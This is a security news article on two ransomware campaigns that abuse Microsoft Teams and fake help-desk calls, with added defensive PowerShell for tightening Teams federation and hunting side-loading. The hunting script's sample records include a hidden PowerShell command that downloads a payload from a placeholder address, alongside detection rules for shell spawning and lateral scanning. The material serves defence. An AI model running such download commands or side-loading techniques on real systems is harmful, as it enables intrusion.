The Register

Ransomware scum make it personal for Reg readers by impersonating tech support

Two ransomware campaigns are abusing Microsoft Teams to infect organizations and steal data, and the crooks may have ties to Black Basta and FIN7, according to Sophos.

The antivirus maker’s managed detection and response (MDR) team began investigating the two separate campaigns in November and December. Both of the ransomware crews, which Sophos calls STAC5143 and STAC5777, operated their own Microsoft Office 365 service tenants for these attacks and also abused a default Teams configuration that allows external users to initiate meetings or chats with internal ones.
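The Teams default that both crews leaned on is tenant federation (external access) being open to every Microsoft 365 tenant. The following is an added example, not code from Sophos or The Register, of how a Teams admin can inspect that setting and tighten it with the MicrosoftTeams PowerShell module; it assumes the module is installed, a Teams Administrator role, and that `partner.example` stands in for a domain you genuinely collaborate with.

```powershell
# Added example, not code from Sophos or The Register. Assumes the
# MicrosoftTeams PowerShell module (Install-Module MicrosoftTeams) and a
# Teams Administrator role; run Connect-MicrosoftTeams before this script.
# 'partner.example' is a placeholder for a domain you actually work with.

# 1. Read the tenant-wide external access (federation) configuration.
$fed = Get-CsTenantFederationConfiguration
$fed | Select-Object AllowFederatedUsers, AllowTeamsConsumer,
                     AllowTeamsConsumerInbound, AllowedDomains, BlockedDomains

# The shipping default is open federation: AllowFederatedUsers is $true and
# AllowedDomains is AllowAllKnownDomains, so any Microsoft 365 tenant,
# including one an attacker registered that morning, can chat with or call
# your users and ask them to hand over screen control.

# 2. Hardened state: allow only an explicit list of partner tenants, and
#    refuse personal (consumer) Teams accounts in both directions.
$partners = New-Object 'System.Collections.Generic.List[string]'
$partners.Add('partner.example')
Set-CsTenantFederationConfiguration -AllowedDomainsAsAList $partners
Set-CsTenantFederationConfiguration -AllowTeamsConsumer $false `
                                    -AllowTeamsConsumerInbound $false

# 3. Verify: AllowedDomains should now carry only the partner domains.
Get-CsTenantFederationConfiguration |
    Select-Object AllowFederatedUsers, AllowedDomains, AllowTeamsConsumer
```

Two caveats. Blocking consumer accounts on its own would not have stopped these attacks, because both crews operated their own Office 365 tenants; the domain allow-list is the control that matters. And if the business cannot live with an allow-list, treat any unsolicited "help desk" or "IT" call or chat from a tenant you do not recognise as an incident, not a support ticket.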

STAC5777, we’re told, overlaps with a group Microsoft tracks as Storm-1811 that was previously spotted abusing Microsoft’s Quick Assist application to deploy Black Basta ransomware.

The second group, STAC5143, may have ties to Russia’s FIN7, also called Sangria Tempest or Carbon Spider.

However, while some of the malware used in the two recent STAC5143 attacks was similar to that used by FIN7, “this attack chain was different, and targeted organizations smaller and in different business sectors than FIN7’s usual victims,” Sophos threat hunters Mark Parsons, Colin Cowie, Daniel Souter, Hunter Neal, Anthony Bradshaw, and Sean Gallagher said in a Tuesday report.

From email spam to device takeover

STAC5143 first appeared on the Sophos team’s radar in November, when a customer reported receiving more than 3,000 spam emails in a 45-minute period. 

Soon after, the customer received a Microsoft Teams call from outside the org, coming from a bogus “Help Desk Manager” account. During the call, the phony help desk instructed the employee to allow a remote screen control session through Teams. The attacker then used this access to open a command shell, drop some files, and run malware on the victim’s machine.

More specifically, one of the files dropped was a .jar archive of Java code, run with no console window by the legit javaw.exe program. The Java code in turn executed PowerShell commands that downloaded a 7zip archive together with the 7zip archiving utility; the unpacked archive contained a ProtonVPN executable and a malicious DLL (nethost.dll) that the Proton executable side-loaded.

After launching the ProtonVPN executable to side-load nethost.dll, the attackers connected to virtual private servers hosted in Russia, the Netherlands, and the US. This is what ultimately tripped Sophos's endpoint protection, we're told, with the trigger being the load of a suspicious unsigned DLL.

The Java code also did some reconnaissance work, mainly scoping out the user's account name and local network, and ultimately extracted from a dropped winter.zip archive and ran a payload containing a Python-based backdoor for remotely controlling the Windows computer. The Python code used a lambda function to obfuscate the malware, a trick that matched previously spotted FIN7-related Python malware loaders.

Two other pieces of Python code extracted by the malware included copies of a publicly available reverse SOCKS proxy called RPivot, which FIN7 has also used in its earlier attacks.

“Sophos assesses with medium confidence that the Python malware used in this attack is connected to the threat actors behind FIN7/Sangria Tempest,” the incident responders noted.

STAC5777 spotted deploying Black Basta ransomware

Similarly, the STAC5777 attacks began with massive amounts of spam emails sent to targeted orgs followed by Teams messages claiming to be from the internal IT team. These messages requested a Teams call to stop the spam.

“But unlike the STAC5143 incidents we’ve observed, STAC5777 activity relied much more on ‘hands-on-keyboard’ actions and scripted commands launched by the threat actors directly than STAC5143,” the Sophos team said.

In each of these instances, the attackers guided the victim through installing and executing Microsoft’s Quick Assist remote access tool, which then gave them control of the victim’s device. 

After taking control of the Windows machine, the miscreants downloaded a payload containing, among other things, a malicious DLL, winhttp.dll, that collected the user's system, OS, and configuration details, harvested stored credentials, and logged keystrokes.

The attackers also downloaded unsigned DLLs derived from an OpenSSL toolkit and placed them where the legit Windows OneDriveStandaloneUpdater.exe process would load them, so that the trusted updater unwittingly established encrypted command-and-control (C2) connections to remote hosts, including a virtual private server linked to infrastructure favored by Russia-based criminals.

After establishing the C2 communications, the OneDriveStandaloneUpdater.exe process was made to scan for Remote Desktop Protocol and Windows Remote Management (WinRM) hosts that could be accessed using the victims’ stolen credentials.
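The two chains above share three behaviours that stand out in ordinary endpoint telemetry: javaw.exe spawning PowerShell (STAC5143), an unsigned DLL being loaded from a user-writable directory into a signed host process (nethost.dll beside ProtonVPN.exe, winhttp.dll beside OneDriveStandaloneUpdater.exe), and the OneDrive updater reaching out to RDP and WinRM ports. The following is an added hunting example, not code from Sophos or The Register, that runs those three checks over Sysmon-style records. The records, the user name `alice`, the file paths and the 203.0.113.x and 10.x addresses are constructed for the example; in production you would build the same objects from `Get-WinEvent -LogName 'Microsoft-Windows-Sysmon/Operational'`.

```powershell
# Added example, not code from Sophos or The Register. All records below are
# constructed: user 'alice', the paths, and the 203.0.113.x / 10.x addresses
# are placeholders. Field names follow Sysmon event IDs 1 (process create),
# 7 (image load) and 3 (network connect).

$events = @(
    # Event 1: process creation
    [pscustomobject]@{ Id = 1; ParentImage = 'C:\Windows\explorer.exe'
                       Image = 'C:\Program Files\Java\bin\javaw.exe'
                       CommandLine = 'javaw.exe -jar C:\Users\alice\Downloads\update.jar' }
    [pscustomobject]@{ Id = 1; ParentImage = 'C:\Program Files\Java\bin\javaw.exe'
                       Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                       CommandLine = 'powershell -w hidden -c "iwr http://203.0.113.10/p.7z -OutFile $env:TEMP\p.7z"' }
    # Event 7: image load
    [pscustomobject]@{ Id = 7; Image = 'C:\Users\alice\AppData\Local\Temp\p\ProtonVPN.exe'
                       ImageLoaded = 'C:\Users\alice\AppData\Local\Temp\p\nethost.dll'
                       Signed = 'false'; SignatureStatus = 'Unavailable' }
    [pscustomobject]@{ Id = 7; Image = 'C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe'
                       ImageLoaded = 'C:\Users\alice\AppData\Local\Microsoft\OneDrive\winhttp.dll'
                       Signed = 'false'; SignatureStatus = 'Unavailable' }
    [pscustomobject]@{ Id = 7; Image = 'C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe'
                       ImageLoaded = 'C:\Windows\System32\winhttp.dll'
                       Signed = 'true'; SignatureStatus = 'Valid' }
    # Event 3: network connection
    [pscustomobject]@{ Id = 3; Image = 'C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe'
                       DestinationIp = '10.20.30.40'; DestinationPort = 3389 }
    [pscustomobject]@{ Id = 3; Image = 'C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe'
                       DestinationIp = '10.20.30.41'; DestinationPort = 5985 }
    [pscustomobject]@{ Id = 3; Image = 'C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe'
                       DestinationIp = '203.0.113.20'; DestinationPort = 443 }
)

# Rule 1: a Java runtime spawning a shell. javaw.exe is the console-less
# launcher; legitimate desktop Java apps rarely need PowerShell or cmd.
function Find-JavaSpawningShell {
    param([object[]]$Events)
    $Events | Where-Object {
        $_.Id -eq 1 -and
        $_.ParentImage -match '\\javaw?\.exe$' -and
        $_.Image -match '\\(powershell|pwsh|cmd)\.exe$'
    }
}

# Rule 2: DLL side-loading. Flag a load when the DLL lives outside the Windows
# directory and is either unsigned in a user-writable path, or carries the
# name of a DLL that normally lives in System32 (winhttp.dll and friends).
# nethost.dll is a legitimate .NET hosting shim shipped beside many apps, so
# its name alone is a poor signal; the signature-plus-location test catches it.
function Find-SideloadedDll {
    param([object[]]$Events)
    $systemDllNames = @('winhttp.dll', 'version.dll', 'cryptbase.dll', 'dbghelp.dll')
    $Events | Where-Object {
        $_.Id -eq 7 -and
        $_.ImageLoaded -notmatch '^C:\\Windows\\' -and
        (
            ($systemDllNames -contains (Split-Path -Path $_.ImageLoaded -Leaf)) -or
            ($_.Signed -eq 'false' -and $_.ImageLoaded -match '\\(Users|ProgramData)\\')
        )
    }
}

# Rule 3: the OneDrive updater only needs HTTPS to Microsoft. RDP, WinRM or SMB
# destinations from it are the credential-driven scanning described above.
function Find-UpdaterLateralScan {
    param([object[]]$Events)
    $lateralPorts = @(3389, 5985, 5986, 445)
    $Events | Where-Object {
        $_.Id -eq 3 -and
        $_.Image -match '\\OneDriveStandaloneUpdater\.exe$' -and
        $lateralPorts -contains [int]$_.DestinationPort
    }
}

Find-JavaSpawningShell  -Events $events | Format-Table ParentImage, Image, CommandLine -AutoSize
Find-SideloadedDll      -Events $events | Format-Table Image, ImageLoaded, Signed -AutoSize
Find-UpdaterLateralScan -Events $events | Format-Table Image, DestinationIp, DestinationPort -AutoSize
```

Against the constructed records, rule 1 returns the single powershell.exe child of javaw.exe, rule 2 returns the two unsigned loads (nethost.dll from the Temp directory and winhttp.dll from the OneDrive directory) while passing the genuine System32 winhttp.dll, and rule 3 returns the 3389 and 5985 connections while passing the HTTPS one. None of the three rules depends on a hash or a C2 address, which is the point: the tooling in both campaigns was ordinary, and it is the pairing of a trusted signed parent with an untrusted child or module that gives the game away.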

The attackers then attempted to move laterally to other hosts. In one case, they used the backdoor to uninstall local multifactor authentication integration on the compromised device. 

Sophos also observed the crims hoovering up local files with "password" in the file name. Plus, in one case, which Sophos says its protections blocked, STAC5777 attempted to infect the machine with the Black Basta ransomware. ®